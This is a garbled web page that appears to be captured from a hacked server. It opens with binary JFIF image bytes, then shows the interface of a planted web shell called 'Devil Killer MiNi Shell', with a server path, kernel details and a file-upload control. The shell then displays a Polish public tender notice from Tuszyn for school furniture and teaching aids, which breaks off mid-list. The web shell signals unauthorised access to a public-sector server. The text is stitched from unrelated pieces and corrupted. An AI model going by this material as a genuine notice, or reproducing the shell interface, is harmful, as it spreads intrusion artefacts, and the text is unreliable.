JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230428/0019926901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa pomocy dydaktycznych, wyposażenia i innego sprzętu szkolnego <br/>w ramach projektu pt.: POPRAWA POZIOMU DOSTĘPNOŚCI SZKÓŁ PODSTAWOWYCH W GMINIE TUSZYN. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centrum Obsługi Administracyjno - Finansowej Szkół i Przedszkoli w Tuszynie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 366077275</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piotrkowska 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tuszyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">95-080</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL712 - Łódzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">42 614 34 51</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dyrektor@coafsip.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.coafsip.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Centrum Obsługi Administracyjno - Finansowej Szkół i Przedszkoli w Tuszynie</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">NIP 771 11 04 507</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Piotrkowska 13</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Tuszyn</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">95-080</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL712 - Łódzki</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">42 614 34 51</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">dyrektor@coafsip.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">https://www.coafsip.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa pomocy dydaktycznych, wyposażenia i innego sprzętu szkolnego <br/>w ramach projektu pt.: POPRAWA POZIOMU DOSTĘPNOŚCI SZKÓŁ PODSTAWOWYCH W GMINIE TUSZYN. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-801adca4-e5c7-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00199269</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Program Operacyjny Wiedza Edukacja Rozwój 2014 - 2020, jako pilotaż działania &#34;Szkoła bez barier&#34; - program Dostępność Plus realizowany przez Fundację Fundusz Współpracy i Fundację Instytut Rozwoju Regionalnego </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gminatuszyn.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja odbywa się za pośrednictwem platformy zakupowej dostępnej pod adresem https://gminatuszyn.ezamawiający.pl oraz poczty elektronicznej zamawiającego dyrektor@coafsip.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania zostały opisane w SWZ pkt. XII Informacje o środkach komunikacji elektronicznej, przy użciu których Zamawiający będzie się komunikował z wykonawcami,oraz informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej; w pkt. XVI opis sposobu przygotowania oferty; XVII opis sposobu złożenia oferty; w pkt. XVIII składanie i otwarcie ofert</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 „RODO”, informuję, że:<br/>1. administratorem Pani/Pana danych osobowych, Wykonawcy oraz osób, których dane Wykonawca przekazuje w niniejszym<br/>postępowaniu jest Centrum Obsługi Administracyjno-Finansowej Szkół i Przedszkoli w Tuszynie; 2. kontakt z Inspektorem Ochrony<br/>Danych możliwy jest pod adresem e-mail: t.filipiak@secmed.pl;<br/>3. Pani/Pana dane osobowe niezbędne do udziału w postępowaniu będą przetwarzane w celu związanym z realizacją postępowania<br/>o udzielenie zamówienia publicznego (przeprowadzenia postępowania<br/>o udzielenie zamówienia publicznego, wyłonienia wykonawcy, zawarcia umowy, realizacji zamówienia, zgodnie z art. 6 ust. 1 lit. b, c i<br/>e oraz art. 10;<br/>4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2022 r. poz. 1710), oraz<br/>inni odbiorcy;<br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy lub udzielonej przez Wykonawcę gwarancji i rękojmi przekracza<br/>4 lata, okres przechowywania obejmuje cały czas trwania umowy lub trwania okresu gwarancji i rękojmi, z zastrzeżeniem że okres przechowywania danych w przypadku zamówień współfinansowanych ze środków unijnych wynika z przepisów dotyczących<br/>przyznania tych środków. Pani/Pana dane będą przechowywane zgodnie z terminami archiwizacji określonymi przez ustawy<br/>kompetencyjne lub ustawę z dnia 14 czerwca 1960 r. Kodeks postępowania administracyjnego i ustawę z dnia 14 lipca 1983 r. o<br/>narodowym zasobie archiwalnym i archiwach , w tym Rozporządzenie Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie<br/>instrukcji kancelaryjnej,<br/>6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego, konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO i nie będą profilowane;<br/>8. posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących. W przypadku gdy wykonanie<br/>obowiązków, o których mowa w art. 15 ust. 1 – 3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku,<br/>zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie<br/>żądania, w szczególności podania nazwy lub daty postępowania / zakończonego postępowania o udzielenie zamówienia<br/>publicznego lub konkursu;<br/>- na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych, o ile ich zmiana nie skutkuje<br/>zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z<br/>ustawą Pzp oraz nie narusza integralności protokołu oraz jego załączników;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia; - prawo do wniesienia<br/>skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana<br/>dotyczących narusza przepisy RODO; pełna klauzula dostępna jest w dokumentach zamówienia</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. b i c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">D.2301.05.2023.M.K.</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 - Meble szkolne; wg. następującego asortymentu:<br/>1. Krzesełko szkolne, uczniowskie 93 szt.<br/>2.	Stół uczniowski, ławka szkolna 45 szt.<br/>3.	Stół uczniowski, szkolny, regulowany	3 szt.<br/>4.	Krzesło szkolne regulowane 3 szt. <br/>5.	Lampka na stolik 3 szt.<br/>6.	Stół uczniowski, szkolny, regulowany	3 szt.<br/>7.	Krzesło szkolne regulowane 3 szt.<br/>8.	Szafka do biurka 3 szt.<br/>9.	Szafka, regał szkolny, 3 szt.<br/>10.	Lampka LED na stolik szkolny 3 szt.<br/>11.	Krzesełko szkolne, uczniowskie 41 szt. <br/>12.	Stół uczniowski świetlicowy 20 szt.<br/>13.	Stół uczniowski, szkolny, regulowany	1 szt.<br/>14.	Krzesło szkolne regulowane 1 szt.<br/>15.	Lampka na stolik 3 szt.<br/> 16. Zestaw parawanów wyciszających	1 szt.<br/>17.	Krzesełko szkolne, uczniowskie 61 szt.<br/>18.	Stół uczniowski stołówkowy 15 szt.<br/>19.	Stół uczniowski, szkolny, regulowany	2 szt.<br/>20.	Krzesło szkolne regulowane 2 szt.<br/>21.	Biurko dla nauczyciela 1 szt.<br/>22.	Stół uczniowski, szkolny, regulowany	1 szt.<br/>23.	Krzesło szkolne regulowane 1 szt.<br/>24.	Lampka na stolik 7 szt.<br/>25.	Kozetka z regulacją wysokości 1 szt.<br/>26.	Stół uczniowski, szkolny, regulowany	1 szt.<br/>27.	Krzesło szkolne regulowane 1 szt.<br/>28.	Stół uczniowski, szkolny, regulowany	5 szt.<br/>29.	Krzesło szkolne regulowane 5 szt.<br/>30.	Zestaw parawanów wyciszających	1 szt.<br/>31.	Pufy 3 szt.<br/>32.	Poduszki 5 szt.<br/>33.	Bujak 1 szt.<br/>34.	Materace 1 szt.<br/>35.	Parawan do kryjówki 2 szt.<br/>36.	Materac do kryjówki 2 szt.<br/>37.	Parawan do kryjówki 1 szt.<br/>38.	Materac do kryjówki do kącika wyciszenia 1 szt.<br/>39.	Pufa - poducha do kącika wyciszenia	1 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39160000-1 - Meble szkolne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona wyboru najkorzystniejszej oferty w oparciu o następujące kryteria dotyczy wszystkich części zamówienia:<br/>1) cena - (C) - 60%<br/>2) termin dostawy (T) – 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2- Pomoce logopedyczne; część obejmuje następujące pozycje asortymentowe:<br/>1.	Tablet z preinstalowanym oprogramowaniem wspierającym komunikację głosową.	1 szt.<br/>2.	TIM – komunikacja alternatywna 1 szt.<br/>3.	Tablet z preinstalowanym oprogramowaniem wspierającym komunikację głosową.	1 szt.<br/>4.	Tablet z preinstalowanym oprogramowaniem wspierającym komunikację głosową.	1 szt.<br/>5.	SPRAWDŹ JAK MÓWIĘ - KARTA BADANIA LOGOPEDYCZNEGO Z MATERIAŁAMI POMOCNICZYMI, 1 szt.<br/>6.	BADANIE KINESTEZJI ARTYKULACYJNEJ. KWESTIONARIUSZE I KARTY 1 szt.<br/>7.	Narzędzie diagnostyczne logopedyczne: SWM - Test do badania zagrożenia dysleksją	1 szt.<br/>8.	Tablet z preinstalowanym oprogramowaniem wspierającym komunikację głosową.	1 szt.<br/>9.	UCZYMY SIĘ MÓWIĆ 2 szt.<br/>10.	MÓWikopaski 2 szt.<br/>11.	MÓWIKARTECZKI 2 szt.<br/>12.	Dmuchawka lokomotywa 1 szt.<br/>13.	Mównica logopedyczna. Paczka czy packa	1 szt.<br/>14.	LOGOTOMY - ĆWICZENIA LOGOPEDYCZNE [PAKIET - CZĘŚCI 1-9], 1 szt.<br/>15.	ĆWICZENIA JĘZYKOWE. CZĘŚĆ 2 - PROPOZYCJE ZADAŃ 1 szt.<br/>16.	Dać rzeczy słowo. Apraksja mowy. 1 szt.<br/>17.	Słuch fonemowy i fonetyczny. Teoria i praktyka 1 szt.<br/> 18.	Logopary. Gra 1 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona wyboru najkorzystniejszej oferty w oparciu o następujące kryteria dotyczy wszystkich części zamówienia:<br/>1) cena - (C) - 60%<br/>2) termin dostawy (T) – 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3- Dydaktyczne pomoce szkolne; część obejmuje następujące pozycje asortymentowe:<br/>1.	Lupa 1 szt.<br/>2.	Luneta 1 szt.<br/>3.	Powiększalnik 1 szt.<br/>4.	Lupa, prostokątne szkło powiększające	3 szt.<br/>5.	Powiększalnik z funkcją mowy 1 szt.<br/>6. Poduszki - siedziska edukacyjne, zestaw.	1 szt.<br/>7.	Mata edukacyjna - pajac	1 szt.<br/>8.	Dysk do balansowania	1<br/>9.	&#34;Buduję poczucie własnej wartości&#34; - Karty pracy dla dzieci i młodzieży z niską samooceną oraz ze spektrum autyzmu	1 szt.<br/>10.	Klocki &#34;mini - wafle&#34;.	1 szt.<br/>11.	Klocki „Magformers”	1 szt.<br/>12.	Klocki drewniane 1 szt.<br/>13.	Chusta animacyjna	1 szt.<br/>14.	kostka emocje 1 szt.<br/>15.	Terapeutyczna gra planszowa, Emocje. Nazywam, rozumiem, wyrażam.	1 szt.<br/>16.	Memo dotykowe &#34;Natura&#34;	1 szt.<br/>17.	Kulodrom 1 szt.<br/>18.	Klocki magnetyczne	1 szt.<br/>19.	Klocki &#34;Jeżyki&#34; 1 szt.<br/>20.	Świecące kostki sensoryczne	1 szt.<br/>21.	Klocki &#34;wiejska zagroda&#34; 1 szt.<br/>22.	Mata &#34;Edukacji w ruchu&#34; 1 szt.<br/>23.	Zestaw instrumentów muzycznych 1 szt.<br/>24.	Dyski sensoryczne 1 szt.<br/>25.	Zgadywanka w pudełku, skrzynka skarbów 1 szt.<br/>26.	Nawlekanka 1 szt.<br/>27.	Wanna piaskowa 1 szt.<br/>28.	Piłki sensoryczne 1 szt.<br/>29.	Zgadywanka do słuchania	1 szt.<br/>30.	Gra tanecza do TV oraz PC z matą	1 szt.<br/>31.	Zestaw kształtek piankowych	1 szt.<br/>32.	Lupa 1 szt.<br/>33.	Lupa 2 szt.<br/>34.	Pakiet edukacyjny &#34;EDUTERAPEUTICA AUTYZM. MATERIAŁY DLA KADRY PEDAGOGICZNEJ&#34; 1 szt.<br/>35.	Słuchawki wygłuszające, terapeutyczne do kryjówki 2 szt.<br/>36.	Zestaw piłeczek sensorycznych do kryjówki 1 szt.<br/>37.	Krążki sensoryczne - do kącika wyciszenia	1 szt.<br/>38.	Słuchawki wygłuszające, terapeutyczne do kryjówki 2 szt.<br/>39.	Pakiet Magia ruchu do Magicznego Dywanu	1 szt.<br/>40.	Spaghetti EDU 1 szt.<br/>41.	&#34;Pytam i odpowiadam &#34;, wymagania minimalne.	2 szt.<br/>42.	Plan dnia - szkoła 2 szt.<br/>43.	Przeciwieństwa - gra edukacyjna 2 szt.<br/>44.	&#34;Rozwijanie 